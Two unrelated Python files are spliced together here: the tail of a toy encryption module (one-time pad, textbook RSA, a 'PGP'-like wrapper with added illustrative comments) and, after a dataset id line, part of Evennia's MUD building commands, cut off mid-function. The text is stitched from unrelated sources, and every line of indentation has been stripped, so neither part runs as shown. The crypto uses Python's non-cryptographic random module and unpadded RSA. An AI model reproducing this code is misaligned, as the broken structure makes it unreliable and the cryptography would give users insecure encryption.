for i in range(0, len(s), 3):
sub = s[i : i + 3]
if sub == '999': continue
result += chr(int(sub))
return result
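
# Quick illustration (not in the original) of the round trip above: every
# character becomes a zero-padded 3-digit ordinal, and a leading '999' sentinel
# protects messages whose first ordinal would otherwise lose its leading zero.
def _demo_text_codec():
    assert txt2int('Hi') == 999072105   # 'H' -> 072, 'i' -> 105, sentinel added
    assert int2txt(999072105) == 'Hi'
    assert txt2int('hi') == 104105      # 'h' -> 104, no sentinel needed
    assert int2txt(104105) == 'hi'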
def gen_one_time_pad(M2):
result = ''
bits = ['0', '1']
for _ in range(len(M2)):
result += random.choice(bits)
return result
def one_time_pad(x, y):
result = ''
for i in range(len(x)):
if x[i] != y[i]:
result += '1'
else:
result += '0'
return result
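
# Illustration (not in the original): one_time_pad() is a bitwise XOR over
# equal-length bit strings, so applying the same pad twice recovers the input.
def _demo_one_time_pad():
    message = '101100'
    pad = gen_one_time_pad(message)       # random bits, same length as message
    cipher = one_time_pad(message, pad)
    assert one_time_pad(cipher, pad) == message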
def extended_euc(a, b):
if a == 0: return b
if b == 0: return a
r0 = a
r1 = b
s0 = 1
s1 = 0
t0 = 0
t1 = 1
q1 = r0 // r1
r2 = r0 - q1 * r1
s2 = s0 - q1 * s1
t2 = t0 - q1 * t1
while r2 != 0:
r0, r1 = r1, r2
s0, s1 = s1, s2
t0, t1 = t1, t2
q1 = r0 // r1
r2 = r0 - q1 * r1
s2 = s0 - q1 * s1
t2 = t0 - q1 * t1
return (r1, s1, t1)
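
# Illustration (not in the original): for nonzero inputs extended_euc(a, b)
# returns (g, s, t) with g == gcd(a, b) and s*a + t*b == g, which is what
# gen_pub_pri_key() below relies on to find the modular inverse of D.
def _demo_extended_euc():
    g, s, t = extended_euc(240, 46)
    assert g == 2 and s * 240 + t * 46 == 2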
def discrete_exponentiation(N, b, e):
d = {1: b}
last_e = 1
next_e = 2
while next_e <= e:
d[next_e] = (d[last_e] ** 2) % N
last_e = next_e
next_e *= 2
binary = list(bin(e))
result = 1
curr = 1
while binary[-1] != 'b':
if binary.pop() == '1':
result = (result * d[curr]) % N
curr *= 2
return result
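
# Illustration (not in the original): discrete_exponentiation() is
# square-and-multiply, so for positive exponents it agrees with Python's
# built-in three-argument pow().
def _demo_discrete_exponentiation():
    assert discrete_exponentiation(1000, 7, 13) == pow(7, 13, 1000) == 407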
def gen_pub_pri_key(P, Q):
N = P * Q
phi = (P - 1) * (Q - 1)
D = random.randrange(phi)
(one, E, t) = extended_euc(D, phi)
while (one != 1):
D = random.randrange(phi)
(one, E, t) = extended_euc(D, phi)
    # extended_euc() can return a negative Bezout coefficient; normalize E into
    # [0, phi) so that discrete_exponentiation(), which expects a positive
    # exponent, works when E is later used as the public exponent.
    E = E % phi
    return (N, D, E)
def pub_key_encr(N, E, M):
(valid, s, t) = extended_euc(M, N)
if not (valid == 1 and M < N):
print('bad message')
return
raised_to_public = discrete_exponentiation(N, M, E)
return raised_to_public
def pri_key_decr(N, D, code):
return discrete_exponentiation(N, code, D)
def closure_PGP(N, E, plaintext):
M_bin = int2bin_str(txt2int(plaintext))
pad_bin = gen_one_time_pad(M_bin)
padded_bin = one_time_pad(M_bin, pad_bin)
padded_dec = int(padded_bin, 2)
pad_dec = int(pad_bin, 2)
pad_encr = pub_key_encr(N, E, pad_dec)
return (padded_dec, pad_encr)
def closure_PGP_decode(N, D, X):
(padded_dec, pad_encr) = X
pad_dec = pri_key_decr(N, D, pad_encr)
pad_bin = int2bin_str(pad_dec)
padded_bin = int2bin_str(padded_dec)
while len(padded_bin) < len(pad_bin):
padded_bin = '0' + padded_bin
while len(pad_bin) < len(padded_bin):
pad_bin = '0' + pad_bin
M_bin = one_time_pad(padded_bin, pad_bin)
M_dec = int(M_bin, 2)
plaintext = int2txt(M_dec)
return plaintext
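
# End-to-end sketch (not part of the original module): generate a key pair,
# wrap a short message with closure_PGP(), and check that closure_PGP_decode()
# recovers it. The primes below are demo assumptions; their product just has
# to exceed the pad's integer value, and the random pad must be coprime to N
# for pub_key_encr() to accept it (overwhelmingly likely at this size).
def _demo_closure_pgp():
    P, Q = 65537, 65521                      # two well-known primes
    N, D, E = gen_pub_pri_key(P, Q)
    E = E % ((P - 1) * (Q - 1))              # guard against a negative Bezout coefficient
    plaintext = 'Hi'
    package = closure_PGP(N, E, plaintext)   # -> (padded message, encrypted pad)
    assert closure_PGP_decode(N, D, package) == plaintext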
|
the-stack_0_1586 | """
Building and world design commands
"""
import re
from django.core.paginator import Paginator
from django.conf import settings
from django.db.models import Q, Min, Max
from evennia import InterruptCommand
from evennia.scripts.models import ScriptDB
from evennia.objects.models import ObjectDB
from evennia.locks.lockhandler import LockException
from evennia.commands.cmdhandler import get_and_merge_cmdsets
from evennia.utils import create, utils, search, logger, funcparser
from evennia.utils.dbserialize import deserialize
from evennia.utils.utils import (
inherits_from,
class_from_module,
get_all_typeclasses,
variable_from_module,
dbref, crop,
interactive,
list_to_string,
display_len,
format_grid,
)
from evennia.utils.eveditor import EvEditor
from evennia.utils.evmore import EvMore
from evennia.utils.evtable import EvTable
from evennia.prototypes import spawner, prototypes as protlib, menus as olc_menus
from evennia.utils.ansi import raw as ansi_raw
COMMAND_DEFAULT_CLASS = class_from_module(settings.COMMAND_DEFAULT_CLASS)
_FUNCPARSER = None
_ATTRFUNCPARSER = None
# limit symbol import for API
__all__ = (
"ObjManipCommand",
"CmdSetObjAlias",
"CmdCopy",
"CmdCpAttr",
"CmdMvAttr",
"CmdCreate",
"CmdDesc",
"CmdDestroy",
"CmdDig",
"CmdTunnel",
"CmdLink",
"CmdUnLink",
"CmdSetHome",
"CmdListCmdSets",
"CmdName",
"CmdOpen",
"CmdSetAttribute",
"CmdTypeclass",
"CmdWipe",
"CmdLock",
"CmdExamine",
"CmdFind",
"CmdTeleport",
"CmdScripts",
"CmdObjects",
"CmdTag",
"CmdSpawn",
)
# used by set
from ast import literal_eval as _LITERAL_EVAL
LIST_APPEND_CHAR = "+"
# used by find
CHAR_TYPECLASS = settings.BASE_CHARACTER_TYPECLASS
ROOM_TYPECLASS = settings.BASE_ROOM_TYPECLASS
EXIT_TYPECLASS = settings.BASE_EXIT_TYPECLASS
_DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
_PROTOTYPE_PARENTS = None
class ObjManipCommand(COMMAND_DEFAULT_CLASS):
"""
This is a parent class for some of the defining objmanip commands
since they tend to have some more variables to define new objects.
Each object definition can have several components. First is
always a name, followed by an optional alias list and finally an
some optional data, such as a typeclass or a location. A comma ','
separates different objects. Like this:
name1;alias;alias;alias:option, name2;alias;alias ...
Spaces between all components are stripped.
A second situation is attribute manipulation. Such commands
are simpler and offer combinations
objname/attr/attr/attr, objname/attr, ...
"""
# OBS - this is just a parent - it's not intended to actually be
# included in a commandset on its own!
def parse(self):
"""
We need to expand the default parsing to get all
the cases, see the module doc.
"""
# get all the normal parsing done (switches etc)
super().parse()
obj_defs = ([], []) # stores left- and right-hand side of '='
        obj_attrs = ([], [])  # ditto, for the attribute-manipulation form
for iside, arglist in enumerate((self.lhslist, self.rhslist)):
# lhslist/rhslist is already split by ',' at this point
for objdef in arglist:
aliases, option, attrs = [], None, []
if ":" in objdef:
objdef, option = [part.strip() for part in objdef.rsplit(":", 1)]
if ";" in objdef:
objdef, aliases = [part.strip() for part in objdef.split(";", 1)]
aliases = [alias.strip() for alias in aliases.split(";") if alias.strip()]
if "/" in objdef:
objdef, attrs = [part.strip() for part in objdef.split("/", 1)]
attrs = [part.strip().lower() for part in attrs.split("/") if part.strip()]
# store data
obj_defs[iside].append({"name": objdef, "option": option, "aliases": aliases})
obj_attrs[iside].append({"name": objdef, "attrs": attrs})
# store for future access
self.lhs_objs = obj_defs[0]
self.rhs_objs = obj_defs[1]
self.lhs_objattr = obj_attrs[0]
self.rhs_objattr = obj_attrs[1]
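
# Hedged illustration (not part of Evennia): what the "name;alias;alias:option"
# syntax documented above boils down to for a single definition, re-parsed the
# same way (":" split first, then ";").
def _demo_objdef_parse(objdef="sword;blade;sharp:weapons.Sword"):
    aliases, option = [], None
    if ":" in objdef:
        objdef, option = [part.strip() for part in objdef.rsplit(":", 1)]
    if ";" in objdef:
        objdef, aliases = [part.strip() for part in objdef.split(";", 1)]
        aliases = [alias.strip() for alias in aliases.split(";") if alias.strip()]
    return {"name": objdef, "option": option, "aliases": aliases}

# _demo_objdef_parse() -> {'name': 'sword', 'option': 'weapons.Sword',
#                          'aliases': ['blade', 'sharp']}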
class CmdSetObjAlias(COMMAND_DEFAULT_CLASS):
"""
adding permanent aliases for object
Usage:
alias <obj> [= [alias[,alias,alias,...]]]
alias <obj> =
alias/category <obj> = [alias[,alias,...]:<category>
Switches:
category - requires ending input with :category, to store the
given aliases with the given category.
Assigns aliases to an object so it can be referenced by more
than one name. Assign empty to remove all aliases from object. If
assigning a category, all aliases given will be using this category.
Observe that this is not the same thing as personal aliases
created with the 'nick' command! Aliases set with alias are
changing the object in question, making those aliases usable
by everyone.
"""
key = "@alias"
aliases = "setobjalias"
switch_options = ("category",)
locks = "cmd:perm(setobjalias) or perm(Builder)"
help_category = "Building"
def func(self):
"""Set the aliases."""
caller = self.caller
if not self.lhs:
string = "Usage: alias <obj> [= [alias[,alias ...]]]"
self.caller.msg(string)
return
objname = self.lhs
# Find the object to receive aliases
obj = caller.search(objname)
if not obj:
return
if self.rhs is None:
# no =, so we just list aliases on object.
aliases = obj.aliases.all(return_key_and_category=True)
if aliases:
caller.msg(
"Aliases for %s: %s"
% (
obj.get_display_name(caller),
", ".join(
"'%s'%s"
% (alias, "" if category is None else "[category:'%s']" % category)
for (alias, category) in aliases
),
)
)
else:
caller.msg("No aliases exist for '%s'." % obj.get_display_name(caller))
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You don't have permission to do that.")
return
if not self.rhs:
# we have given an empty =, so delete aliases
old_aliases = obj.aliases.all()
if old_aliases:
caller.msg(
"Cleared aliases from %s: %s"
% (obj.get_display_name(caller), ", ".join(old_aliases))
)
obj.aliases.clear()
else:
caller.msg("No aliases to clear.")
return
category = None
if "category" in self.switches:
if ":" in self.rhs:
rhs, category = self.rhs.rsplit(":", 1)
category = category.strip()
else:
caller.msg(
"If specifying the /category switch, the category must be given "
"as :category at the end."
)
else:
rhs = self.rhs
# merge the old and new aliases (if any)
old_aliases = obj.aliases.get(category=category, return_list=True)
new_aliases = [alias.strip().lower() for alias in rhs.split(",") if alias.strip()]
# make the aliases only appear once
old_aliases.extend(new_aliases)
aliases = list(set(old_aliases))
# save back to object.
obj.aliases.add(aliases, category=category)
# we need to trigger this here, since this will force
# (default) Exits to rebuild their Exit commands with the new
# aliases
obj.at_cmdset_get(force_init=True)
# report all aliases on the object
caller.msg(
"Alias(es) for '%s' set to '%s'%s."
% (
obj.get_display_name(caller),
str(obj.aliases),
" (category: '%s')" % category if category else "",
)
)
class CmdCopy(ObjManipCommand):
"""
copy an object and its properties
Usage:
copy <original obj> [= <new_name>][;alias;alias..]
[:<new_location>] [,<new_name2> ...]
Create one or more copies of an object. If you don't supply any targets,
one exact copy of the original object will be created with the name *_copy.
"""
key = "@copy"
locks = "cmd:perm(copy) or perm(Builder)"
help_category = "Building"
def func(self):
"""Uses ObjManipCommand.parse()"""
caller = self.caller
args = self.args
if not args:
caller.msg(
"Usage: copy <obj> [=<new_name>[;alias;alias..]]"
"[:<new_location>] [, <new_name2>...]"
)
return
if not self.rhs:
# this has no target =, so an identical new object is created.
from_obj_name = self.args
from_obj = caller.search(from_obj_name)
if not from_obj:
return
to_obj_name = "%s_copy" % from_obj_name
to_obj_aliases = ["%s_copy" % alias for alias in from_obj.aliases.all()]
copiedobj = ObjectDB.objects.copy_object(
from_obj, new_key=to_obj_name, new_aliases=to_obj_aliases
)
if copiedobj:
string = "Identical copy of %s, named '%s' was created." % (
from_obj_name,
to_obj_name,
)
else:
string = "There was an error copying %s."
else:
# we have specified =. This might mean many object targets
from_obj_name = self.lhs_objs[0]["name"]
from_obj = caller.search(from_obj_name)
if not from_obj:
return
for objdef in self.rhs_objs:
# loop through all possible copy-to targets
to_obj_name = objdef["name"]
to_obj_aliases = objdef["aliases"]
to_obj_location = objdef["option"]
if to_obj_location:
to_obj_location = caller.search(to_obj_location, global_search=True)
if not to_obj_location:
return
copiedobj = ObjectDB.objects.copy_object(
from_obj,
new_key=to_obj_name,
new_location=to_obj_location,
new_aliases=to_obj_aliases,
)
if copiedobj:
string = "Copied %s to '%s' (aliases: %s)." % (
from_obj_name,
to_obj_name,
to_obj_aliases,
)
else:
string = "There was an error copying %s to '%s'." % (from_obj_name, to_obj_name)
# we are done, echo to user
caller.msg(string)
class CmdCpAttr(ObjManipCommand):
"""
copy attributes between objects
Usage:
cpattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
cpattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]
Switches:
move - delete the attribute from the source object after copying.
Example:
cpattr coolness = Anna/chillout, Anna/nicety, Tom/nicety
->
copies the coolness attribute (defined on yourself), to attributes
on Anna and Tom.
    Copy an attribute from one object to one or more attributes on another object.
If you don't supply a source object, yourself is used.
"""
key = "@cpattr"
switch_options = ("move",)
locks = "cmd:perm(cpattr) or perm(Builder)"
help_category = "Building"
def check_from_attr(self, obj, attr, clear=False):
"""
Hook for overriding on subclassed commands. Checks to make sure a
caller can copy the attr from the object in question. If not, return a
false value and the command will abort. An error message should be
provided by this function.
If clear is True, user is attempting to move the attribute.
"""
return True
def check_to_attr(self, obj, attr):
"""
Hook for overriding on subclassed commands. Checks to make sure a
caller can write to the specified attribute on the specified object.
If not, return a false value and the attribute will be skipped. An
error message should be provided by this function.
"""
return True
def check_has_attr(self, obj, attr):
"""
Hook for overriding on subclassed commands. Do any preprocessing
required and verify an object has an attribute.
"""
if not obj.attributes.has(attr):
self.caller.msg("%s doesn't have an attribute %s." % (obj.name, attr))
return False
return True
def get_attr(self, obj, attr):
"""
Hook for overriding on subclassed commands. Do any preprocessing
required and get the attribute from the object.
"""
return obj.attributes.get(attr)
def func(self):
"""
Do the copying.
"""
caller = self.caller
if not self.rhs:
string = """Usage:
cpattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
cpattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]"""
caller.msg(string)
return
lhs_objattr = self.lhs_objattr
to_objs = self.rhs_objattr
from_obj_name = lhs_objattr[0]["name"]
from_obj_attrs = lhs_objattr[0]["attrs"]
if not from_obj_attrs:
# this means the from_obj_name is actually an attribute
# name on self.
from_obj_attrs = [from_obj_name]
from_obj = self.caller
else:
from_obj = caller.search(from_obj_name)
if not from_obj or not to_objs:
caller.msg("You have to supply both source object and target(s).")
return
        # copy to all given to_objs
if "move" in self.switches:
clear = True
else:
clear = False
if not self.check_from_attr(from_obj, from_obj_attrs[0], clear=clear):
return
for attr in from_obj_attrs:
if not self.check_has_attr(from_obj, attr):
return
if (len(from_obj_attrs) != len(set(from_obj_attrs))) and clear:
self.caller.msg("|RCannot have duplicate source names when moving!")
return
result = []
for to_obj in to_objs:
to_obj_name = to_obj["name"]
to_obj_attrs = to_obj["attrs"]
to_obj = caller.search(to_obj_name)
if not to_obj:
result.append("\nCould not find object '%s'" % to_obj_name)
continue
for inum, from_attr in enumerate(from_obj_attrs):
try:
to_attr = to_obj_attrs[inum]
except IndexError:
# if there are too few attributes given
# on the to_obj, we copy the original name instead.
to_attr = from_attr
if not self.check_to_attr(to_obj, to_attr):
continue
value = self.get_attr(from_obj, from_attr)
to_obj.attributes.add(to_attr, value)
if clear and not (from_obj == to_obj and from_attr == to_attr):
from_obj.attributes.remove(from_attr)
result.append(
"\nMoved %s.%s -> %s.%s. (value: %s)"
% (from_obj.name, from_attr, to_obj_name, to_attr, repr(value))
)
else:
result.append(
"\nCopied %s.%s -> %s.%s. (value: %s)"
% (from_obj.name, from_attr, to_obj_name, to_attr, repr(value))
)
caller.msg("".join(result))
class CmdMvAttr(ObjManipCommand):
"""
move attributes between objects
Usage:
mvattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
mvattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]
Switches:
copy - Don't delete the original after moving.
Move an attribute from one object to one or more attributes on another
object. If you don't supply a source object, yourself is used.
"""
key = "@mvattr"
switch_options = ("copy",)
locks = "cmd:perm(mvattr) or perm(Builder)"
help_category = "Building"
def func(self):
"""
Do the moving
"""
if not self.rhs:
string = """Usage:
mvattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
mvattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]"""
self.caller.msg(string)
return
# simply use cpattr for all the functionality
if "copy" in self.switches:
self.execute_cmd("cpattr %s" % self.args)
else:
self.execute_cmd("cpattr/move %s" % self.args)
class CmdCreate(ObjManipCommand):
"""
create new objects
Usage:
create[/drop] <objname>[;alias;alias...][:typeclass], <objname>...
switch:
drop - automatically drop the new object into your current
location (this is not echoed). This also sets the new
object's home to the current location rather than to you.
Creates one or more new objects. If typeclass is given, the object
is created as a child of this typeclass. The typeclass script is
assumed to be located under types/ and any further
directory structure is given in Python notation. So if you have a
correct typeclass 'RedButton' defined in
types/examples/red_button.py, you could create a new
object of this type like this:
create/drop button;red : examples.red_button.RedButton
"""
key = "@create"
switch_options = ("drop",)
locks = "cmd:perm(create) or perm(Builder)"
help_category = "Building"
# lockstring of newly created objects, for easy overloading.
# Will be formatted with the {id} of the creating object.
new_obj_lockstring = "control:id({id}) or perm(Admin);delete:id({id}) or perm(Admin)"
def func(self):
"""
Creates the object.
"""
caller = self.caller
if not self.args:
string = "Usage: create[/drop] <newname>[;alias;alias...] [:typeclass.path]"
caller.msg(string)
return
# create the objects
for objdef in self.lhs_objs:
string = ""
name = objdef["name"]
aliases = objdef["aliases"]
typeclass = objdef["option"]
# create object (if not a valid typeclass, the default
# object typeclass will automatically be used)
lockstring = self.new_obj_lockstring.format(id=caller.id)
obj = create.create_object(
typeclass,
name,
caller,
home=caller,
aliases=aliases,
locks=lockstring,
report_to=caller,
)
if not obj:
continue
if aliases:
string = "You create a new %s: %s (aliases: %s)."
string = string % (obj.typename, obj.name, ", ".join(aliases))
else:
string = "You create a new %s: %s."
string = string % (obj.typename, obj.name)
# set a default desc
if not obj.db.desc:
obj.db.desc = "You see nothing special."
if "drop" in self.switches:
if caller.location:
obj.home = caller.location
obj.move_to(caller.location, quiet=True)
if string:
caller.msg(string)
def _desc_load(caller):
return caller.db.evmenu_target.db.desc or ""
def _desc_save(caller, buf):
"""
Save line buffer to the desc prop. This should
return True if successful and also report its status to the user.
"""
caller.db.evmenu_target.db.desc = buf
caller.msg("Saved.")
return True
def _desc_quit(caller):
caller.attributes.remove("evmenu_target")
caller.msg("Exited editor.")
class CmdDesc(COMMAND_DEFAULT_CLASS):
"""
describe an object or the current room.
Usage:
desc [<obj> =] <description>
Switches:
edit - Open up a line editor for more advanced editing.
Sets the "desc" attribute on an object. If an object is not given,
describe the current room.
"""
key = "@desc"
switch_options = ("edit",)
locks = "cmd:perm(desc) or perm(Builder)"
help_category = "Building"
def edit_handler(self):
if self.rhs:
self.msg("|rYou may specify a value, or use the edit switch, but not both.|n")
return
if self.args:
obj = self.caller.search(self.args)
else:
obj = self.caller.location or self.msg("|rYou can't describe oblivion.|n")
if not obj:
return
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
self.caller.msg("You don't have permission to edit the description of %s." % obj.key)
return
self.caller.db.evmenu_target = obj
# launch the editor
EvEditor(
self.caller,
loadfunc=_desc_load,
savefunc=_desc_save,
quitfunc=_desc_quit,
key="desc",
persistent=True,
)
return
def func(self):
"""Define command"""
caller = self.caller
if not self.args and "edit" not in self.switches:
caller.msg("Usage: desc [<obj> =] <description>")
return
if "edit" in self.switches:
self.edit_handler()
return
if "=" in self.args:
# We have an =
obj = caller.search(self.lhs)
if not obj:
return
desc = self.rhs or ""
else:
obj = caller.location or self.msg("|rYou don't have a location to describe.|n")
if not obj:
return
desc = self.args
if obj.access(self.caller, "control") or obj.access(self.caller, "edit"):
obj.db.desc = desc
caller.msg("The description was set on %s." % obj.get_display_name(caller))
else:
caller.msg("You don't have permission to edit the description of %s." % obj.key)
class CmdDestroy(COMMAND_DEFAULT_CLASS):
"""
permanently delete objects
Usage:
destroy[/switches] [obj, obj2, obj3, [dbref-dbref], ...]
Switches:
override - The destroy command will usually avoid accidentally
destroying account objects. This switch overrides this safety.
force - destroy without confirmation.
Examples:
destroy house, roof, door, 44-78
destroy 5-10, flower, 45
destroy/force north
Destroys one or many objects. If dbrefs are used, a range to delete can be
given, e.g. 4-10. Also the end points will be deleted. This command
displays a confirmation before destroying, to make sure of your choice.
You can specify the /force switch to bypass this confirmation.
"""
key = "@destroy"
aliases = ["@delete", "@del"]
switch_options = ("override", "force")
locks = "cmd:perm(destroy) or perm(Builder)"
help_category = "Building"
confirm = True # set to False to always bypass confirmation
default_confirm = "yes" # what to assume if just pressing enter (yes/no)
def func(self):
"""Implements the command."""
caller = self.caller
delete = True
if not self.args or not self.lhslist:
caller.msg("Usage: destroy[/switches] [obj, obj2, obj3, [dbref-dbref],...]")
delete = False
def delobj(obj):
# helper function for deleting a single object
string = ""
if not obj.pk:
string = "\nObject %s was already deleted." % obj.db_key
else:
objname = obj.name
if not (obj.access(caller, "control") or obj.access(caller, "delete")):
return "\nYou don't have permission to delete %s." % objname
if obj.account and "override" not in self.switches:
return (
"\nObject %s is controlled by an active account. Use /override to delete anyway."
% objname
)
if obj.dbid == int(settings.DEFAULT_HOME.lstrip("#")):
return (
"\nYou are trying to delete |c%s|n, which is set as DEFAULT_HOME. "
"Re-point settings.DEFAULT_HOME to another "
"object before continuing." % objname
)
had_exits = hasattr(obj, "exits") and obj.exits
had_objs = hasattr(obj, "contents") and any(
obj
for obj in obj.contents
if not (hasattr(obj, "exits") and obj not in obj.exits)
)
# do the deletion
okay = obj.delete()
if not okay:
string += (
"\nERROR: %s not deleted, probably because delete() returned False."
% objname
)
else:
string += "\n%s was destroyed." % objname
if had_exits:
string += " Exits to and from %s were destroyed as well." % objname
if had_objs:
string += " Objects inside %s were moved to their homes." % objname
return string
objs = []
for objname in self.lhslist:
if not delete:
continue
if "-" in objname:
# might be a range of dbrefs
dmin, dmax = [utils.dbref(part, reqhash=False) for part in objname.split("-", 1)]
if dmin and dmax:
for dbref in range(int(dmin), int(dmax + 1)):
obj = caller.search("#" + str(dbref))
if obj:
objs.append(obj)
continue
else:
obj = caller.search(objname)
else:
obj = caller.search(objname)
if obj is None:
self.caller.msg(
" (Objects to destroy must either be local or specified with a unique #dbref.)"
)
elif obj not in objs:
objs.append(obj)
if objs and ("force" not in self.switches and type(self).confirm):
confirm = "Are you sure you want to destroy "
if len(objs) == 1:
confirm += objs[0].get_display_name(caller)
elif len(objs) < 5:
confirm += ", ".join([obj.get_display_name(caller) for obj in objs])
else:
confirm += ", ".join(["#{}".format(obj.id) for obj in objs])
confirm += " [yes]/no?" if self.default_confirm == "yes" else " yes/[no]"
answer = ""
answer = yield (confirm)
answer = self.default_confirm if answer == "" else answer
if answer and answer not in ("yes", "y", "no", "n"):
caller.msg(
"Canceled: Either accept the default by pressing return or specify yes/no."
)
delete = False
elif answer.strip().lower() in ("n", "no"):
caller.msg("Canceled: No object was destroyed.")
delete = False
if delete:
results = []
for obj in objs:
results.append(delobj(obj))
if results:
caller.msg("".join(results).strip())
class CmdDig(ObjManipCommand):
"""
build new rooms and connect them to the current location
Usage:
dig[/switches] <roomname>[;alias;alias...][:typeclass]
[= <exit_to_there>[;alias][:typeclass]]
[, <exit_to_here>[;alias][:typeclass]]
Switches:
tel or teleport - move yourself to the new room
Examples:
dig kitchen = north;n, south;s
dig house:myrooms.MyHouseTypeclass
dig sheer cliff;cliff;sheer = climb up, climb down
This command is a convenient way to build rooms quickly; it creates the
new room and you can optionally set up exits back and forth between your
current room and the new one. You can add as many aliases as you
like to the name of the room and the exits in question; an example
would be 'north;no;n'.
"""
key = "@dig"
switch_options = ("teleport",)
locks = "cmd:perm(dig) or perm(Builder)"
help_category = "Building"
# lockstring of newly created rooms, for easy overloading.
# Will be formatted with the {id} of the creating object.
new_room_lockstring = (
"control:id({id}) or perm(Admin); "
"delete:id({id}) or perm(Admin); "
"edit:id({id}) or perm(Admin)"
)
def func(self):
"""Do the digging. Inherits variables from ObjManipCommand.parse()"""
caller = self.caller
if not self.lhs:
string = "Usage: dig[/teleport] <roomname>[;alias;alias...]" "[:parent] [= <exit_there>"
string += "[;alias;alias..][:parent]] "
string += "[, <exit_back_here>[;alias;alias..][:parent]]"
caller.msg(string)
return
room = self.lhs_objs[0]
if not room["name"]:
caller.msg("You must supply a new room name.")
return
location = caller.location
# Create the new room
typeclass = room["option"]
if not typeclass:
typeclass = settings.BASE_ROOM_TYPECLASS
# create room
new_room = create.create_object(
typeclass, room["name"], aliases=room["aliases"], report_to=caller
)
lockstring = self.new_room_lockstring.format(id=caller.id)
new_room.locks.add(lockstring)
alias_string = ""
if new_room.aliases.all():
alias_string = " (%s)" % ", ".join(new_room.aliases.all())
room_string = "Created room %s(%s)%s of type %s." % (
new_room,
new_room.dbref,
alias_string,
typeclass,
)
# create exit to room
exit_to_string = ""
exit_back_string = ""
if self.rhs_objs:
to_exit = self.rhs_objs[0]
if not to_exit["name"]:
exit_to_string = "\nNo exit created to new room."
elif not location:
exit_to_string = "\nYou cannot create an exit from a None-location."
else:
# Build the exit to the new room from the current one
typeclass = to_exit["option"]
if not typeclass:
typeclass = settings.BASE_EXIT_TYPECLASS
new_to_exit = create.create_object(
typeclass,
to_exit["name"],
location,
aliases=to_exit["aliases"],
locks=lockstring,
destination=new_room,
report_to=caller,
)
alias_string = ""
if new_to_exit.aliases.all():
alias_string = " (%s)" % ", ".join(new_to_exit.aliases.all())
exit_to_string = "\nCreated Exit from %s to %s: %s(%s)%s."
exit_to_string = exit_to_string % (
location.name,
new_room.name,
new_to_exit,
new_to_exit.dbref,
alias_string,
)
# Create exit back from new room
if len(self.rhs_objs) > 1:
# Building the exit back to the current room
back_exit = self.rhs_objs[1]
if not back_exit["name"]:
exit_back_string = "\nNo back exit created."
elif not location:
exit_back_string = "\nYou cannot create an exit back to a None-location."
else:
typeclass = back_exit["option"]
if not typeclass:
typeclass = settings.BASE_EXIT_TYPECLASS
new_back_exit = create.create_object(
typeclass,
back_exit["name"],
new_room,
aliases=back_exit["aliases"],
locks=lockstring,
destination=location,
report_to=caller,
)
alias_string = ""
if new_back_exit.aliases.all():
alias_string = " (%s)" % ", ".join(new_back_exit.aliases.all())
exit_back_string = "\nCreated Exit back from %s to %s: %s(%s)%s."
exit_back_string = exit_back_string % (
new_room.name,
location.name,
new_back_exit,
new_back_exit.dbref,
alias_string,
)
caller.msg("%s%s%s" % (room_string, exit_to_string, exit_back_string))
if new_room and "teleport" in self.switches:
caller.move_to(new_room)
class CmdTunnel(COMMAND_DEFAULT_CLASS):
"""
create new rooms in cardinal directions only
Usage:
tunnel[/switch] <direction>[:typeclass] [= <roomname>[;alias;alias;...][:typeclass]]
Switches:
oneway - do not create an exit back to the current location
tel - teleport to the newly created room
Example:
tunnel n
tunnel n = house;mike's place;green building
This is a simple way to build using pre-defined directions:
|wn,ne,e,se,s,sw,w,nw|n (north, northeast etc)
|wu,d|n (up and down)
|wi,o|n (in and out)
The full names (north, in, southwest, etc) will always be put as
main name for the exit, using the abbreviation as an alias (so an
exit will always be able to be used with both "north" as well as
"n" for example). Opposite directions will automatically be
created back from the new room unless the /oneway switch is given.
For more flexibility and power in creating rooms, use dig.
"""
key = "@tunnel"
aliases = ["@tun"]
switch_options = ("oneway", "tel")
locks = "cmd: perm(tunnel) or perm(Builder)"
help_category = "Building"
# store the direction, full name and its opposite
directions = {
"n": ("north", "s"),
"ne": ("northeast", "sw"),
"e": ("east", "w"),
"se": ("southeast", "nw"),
"s": ("south", "n"),
"sw": ("southwest", "ne"),
"w": ("west", "e"),
"nw": ("northwest", "se"),
"u": ("up", "d"),
"d": ("down", "u"),
"i": ("in", "o"),
"o": ("out", "i"),
}
def func(self):
"""Implements the tunnel command"""
if not self.args or not self.lhs:
string = (
"Usage: tunnel[/switch] <direction>[:typeclass] [= <roomname>"
"[;alias;alias;...][:typeclass]]"
)
self.caller.msg(string)
return
# If we get a typeclass, we need to get just the exitname
exitshort = self.lhs.split(":")[0]
if exitshort not in self.directions:
string = "tunnel can only understand the following directions: %s." % ",".join(
sorted(self.directions.keys())
)
string += "\n(use dig for more freedom)"
self.caller.msg(string)
return
# retrieve all input and parse it
exitname, backshort = self.directions[exitshort]
backname = self.directions[backshort][0]
        # if we received a typeclass for the exit, add it to the alias (short name)
if ":" in self.lhs:
# limit to only the first : character
exit_typeclass = ":" + self.lhs.split(":", 1)[-1]
